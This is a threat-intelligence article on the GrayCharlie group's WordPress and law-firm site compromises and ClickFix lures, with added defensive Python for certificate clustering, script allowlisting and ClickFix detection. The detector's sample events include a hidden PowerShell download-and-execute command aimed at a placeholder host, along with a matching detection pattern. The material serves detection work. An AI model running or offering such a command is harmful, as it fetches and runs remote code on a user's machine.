The “ClickFix” Trap: GrayCharlie Syndicate Hijacks U.S. Law Firm Sites in Sophisticated Supply-Chain Strike
Insikt Group has published the first comprehensive report on GrayCharlie, a threat group that has been compromising WordPress sites since mid-2023 to deliver malicious payloads through fake browser updates and the ClickFix technique. According to the research, the group recently breached the websites of several prominent U.S. law firms, an escalation that may indicate a software supply chain attack.
GrayCharlie, which overlaps with the SmartApeSG cluster, embeds references to external JavaScript in the compromised sites. That script redirects visitors to pages offering counterfeit Chrome, Edge or Firefox updates, or presents a fake CAPTCHA. Running the downloaded file installs NetSupport RAT, sometimes alongside the Stealc infostealer and SectopRAT. The primary goals of these campaigns are data theft and financial gain, though resale of system access to other criminal groups remains a distinct possibility.
Analysts mapped an extensive infrastructure tied to GrayCharlie. NetSupport RAT command-and-control (C2) servers were hosted mainly at MivoCloud and HZ Hosting Ltd. The servers were grouped into clusters by shared TLS certificate attributes, serial numbers and licensing keys; in several cases certificates were issued almost simultaneously, pointing to centralized administration. The investigation also noted heavy use of proxy services and SSH for managing the infrastructure.
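The clustering described above can be reproduced on scan data with very little code. The following is an added example, not part of the report or any tool it mentions: it groups constructed TLS scan records by certificate serial and then looks for certificates issued within a short window of each other. The record fields, the IP addresses, serials and timestamps are all made up for the example.

```python
"""Cluster C2 candidates by shared TLS certificate serial and by near-simultaneous issuance.

Added example; the records below are constructed and do not describe real hosts.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed scan records (fields loosely modelled on what a TLS scanner returns).
RECORDS = [
    {"ip": "203.0.113.10", "provider": "MivoCloud", "serial": "0A1B", "not_before": "2025-03-01T10:00:00"},
    {"ip": "203.0.113.11", "provider": "MivoCloud", "serial": "0A1B", "not_before": "2025-03-01T10:00:00"},
    {"ip": "198.51.100.7", "provider": "HZ Hosting Ltd", "serial": "0C2D", "not_before": "2025-03-01T10:03:00"},
    {"ip": "198.51.100.9", "provider": "OtherHost", "serial": "FFEE", "not_before": "2024-11-20T08:00:00"},
]


def cluster_by_serial(records):
    """Map each certificate serial to the sorted list of IPs presenting it.

    The same serial on several hosts means the same certificate was copied
    around, which is a strong link between those hosts.
    """
    groups = defaultdict(list)
    for r in records:
        groups[r["serial"]].append(r["ip"])
    return {serial: sorted(ips) for serial, ips in groups.items()}


def issuance_bursts(records, window=timedelta(minutes=10)):
    """Return groups of IPs whose certificate not_before times chain together
    within `window` of the previous one (a burst of issuance, which suggests
    one operator provisioning several servers at once).
    """
    ordered = sorted(records, key=lambda r: datetime.fromisoformat(r["not_before"]))
    bursts, current = [], [ordered[0]]
    for prev, cur in zip(ordered, ordered[1:]):
        gap = datetime.fromisoformat(cur["not_before"]) - datetime.fromisoformat(prev["not_before"])
        if gap <= window:
            current.append(cur)
        else:
            bursts.append(current)
            current = [cur]
    bursts.append(current)
    # A single certificate on its own is not a burst.
    return [sorted(r["ip"] for r in b) for b in bursts if len(b) > 1]


if __name__ == "__main__":
    for serial, ips in cluster_by_serial(RECORDS).items():
        print(f"serial {serial}: {ips}")
    for burst in issuance_bursts(RECORDS):
        print("issued together:", burst)
```

The burst check compares each certificate with the one issued just before it, so a run of certificates a few minutes apart is collected into one group even if the first and last are more than `window` apart; tighten this by comparing against the first member of the group if that behaviour is not wanted.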
A significant part of the report concerns a cluster of U.S. law firms: at least fifteen were found loading malicious scripts from the persistancejs.store domain. Many of these sites are associated with SMB Team, a provider of IT and marketing services for the legal sector.
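The injection mechanism described earlier (an external script reference added to a compromised site) and the persistancejs.store loader found on the law firm sites can both be caught by the same check: list every third-party host a page loads scripts from and compare it with a known-good allowlist. The example below is added here and is not code from the report or from SMB Team; the allowlist, the page host and the sample HTML are constructed.

```python
"""Flag <script src> references to hosts that are not on a site's allowlist.

Added example. The allowlist and the sample page are constructed; in practice
the allowlist should come from a known-good snapshot of the site.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed legitimate script origins for the monitored site.
ALLOWED_SCRIPT_HOSTS = {
    "cdnjs.cloudflare.com",
}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def external_script_hosts(html, page_host):
    """Hosts that serve scripts to this page, excluding the page's own host.

    Absolute and protocol-relative (//host/x.js) URLs are handled; relative
    paths resolve to the page host and are therefore ignored.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    hosts = set()
    for src in parser.srcs:
        if src.startswith("//"):
            src = "https:" + src
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            hosts.add(host.lower())
    return hosts


def suspicious_script_hosts(html, page_host, allowed=ALLOWED_SCRIPT_HOSTS):
    """External script hosts that are not on the allowlist: these need review."""
    return sorted(h for h in external_script_hosts(html, page_host) if h not in allowed)


# Constructed sample page: a local script, one allowlisted CDN script, and an
# injected reference to the loader domain named in the report.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lodash/4.17.21/lodash.min.js"></script>
<script src='https://persistancejs.store/load.js'></script>
</head><body>...</body></html>"""

if __name__ == "__main__":
    for host in suspicious_script_hosts(SAMPLE_PAGE, "www.example-lawfirm.test"):
        print("review:", host)
```

Run the check against the page as a browser receives it (the rendered HTML, fetched over HTTPS with a normal user agent), since the injected reference lives in the served output rather than necessarily in files you can see in the WordPress admin panel; inline scripts that build a `<script>` element at runtime are not covered by this static pass.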
The appearance of the malicious domain coincided with a leak of credentials tied to SMB Team's infrastructure, leading researchers to hypothesize a compromise of the contractor, a classic supply chain attack. An alternative theory is exploitation of vulnerable WordPress versions or plugins used by the firm's clients.
In 2025 GrayCharlie leaned more heavily on the ClickFix technique. A visitor to an infected site is asked to complete a "verification" CAPTCHA, which silently copies a command to the system clipboard; the visitor is then told to run that command from the Windows "Run" dialog, which downloads an archive containing NetSupport RAT. In other cases victims are talked into installing a supposed browser update. In both scenarios the malware persists through Windows Registry autorun keys and keeps a connection to the C2 server.
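From a detection standpoint, the ClickFix flow above leaves a recognisable trace on the endpoint: a shell or download-capable binary started by the Windows shell (explorer.exe, which is what the Run dialog launches through) with a command line that fetches or decodes content. The following added example, not from the report, runs that logic over constructed process-creation events written as JSON lines; the field names, paths, user and URL are assumptions and the sample command line points at a non-routable placeholder host.

```python
"""Flag process-creation events that look like a pasted ClickFix command.

Added example. Events are constructed JSON lines with assumed field names,
not real Sysmon or EDR output.
"""
import json
import re
from dataclasses import dataclass

# Shells and download-capable binaries a pasted one-liner typically invokes.
SHELL_IMAGES = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}

# Command-line traits of a one-liner that fetches, decodes or hides itself.
PAYLOAD_HINTS = re.compile(
    r"https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b"
    r"|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_like(ev):
    """True when explorer.exe launched a shell whose command line fetches or decodes."""
    return (
        _basename(ev.parent_image) == "explorer.exe"
        and _basename(ev.image) in SHELL_IMAGES
        and PAYLOAD_HINTS.search(ev.command_line) is not None
    )


def parse_events(jsonl):
    """Parse one JSON object per line into ProcEvent records."""
    events = []
    for line in jsonl.strip().splitlines():
        d = json.loads(line)
        events.append(ProcEvent(d["ParentImage"], d["Image"], d["CommandLine"], d["User"]))
    return events


def find_clickfix_candidates(jsonl):
    return [ev for ev in parse_events(jsonl) if is_clickfix_like(ev)]


# Constructed events: one Run-dialog style download one-liner, one ordinary
# program launch, one shell started by an editor, one harmless cmd invocation.
SAMPLE_EVENTS = r"""
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iwr http://example.invalid/stage | iex\"", "User": "CORP\\jdoe"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe", "User": "CORP\\jdoe"}
{"ParentImage": "C:\\Users\\jdoe\\AppData\\Local\\Programs\\Code.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c Get-ChildItem", "User": "CORP\\jdoe"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c dir", "User": "CORP\\jdoe"}
"""

if __name__ == "__main__":
    for ev in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"ClickFix candidate for {ev.user}: {ev.command_line}")
```

Because explorer.exe is the parent of anything a user starts by double-clicking, the command-line condition is what keeps this from firing on every PowerShell launch; tune `PAYLOAD_HINTS` to your environment. During triage the Run dialog's history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` records what was pasted, and the autorun keys the article mentions are where the resulting persistence will show up.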
While analyzing one malicious build, researchers observed operator activity within hours of the initial compromise. The operator archived files and ran reconnaissance commands to enumerate domain groups and user accounts, confirming a strong interest in internal corporate network information. Insikt Group assesses that the group maintains a steady operational tempo and frequently stands up new infrastructure. Given its focus on U.S. organizations, the risk of further attacks remains high.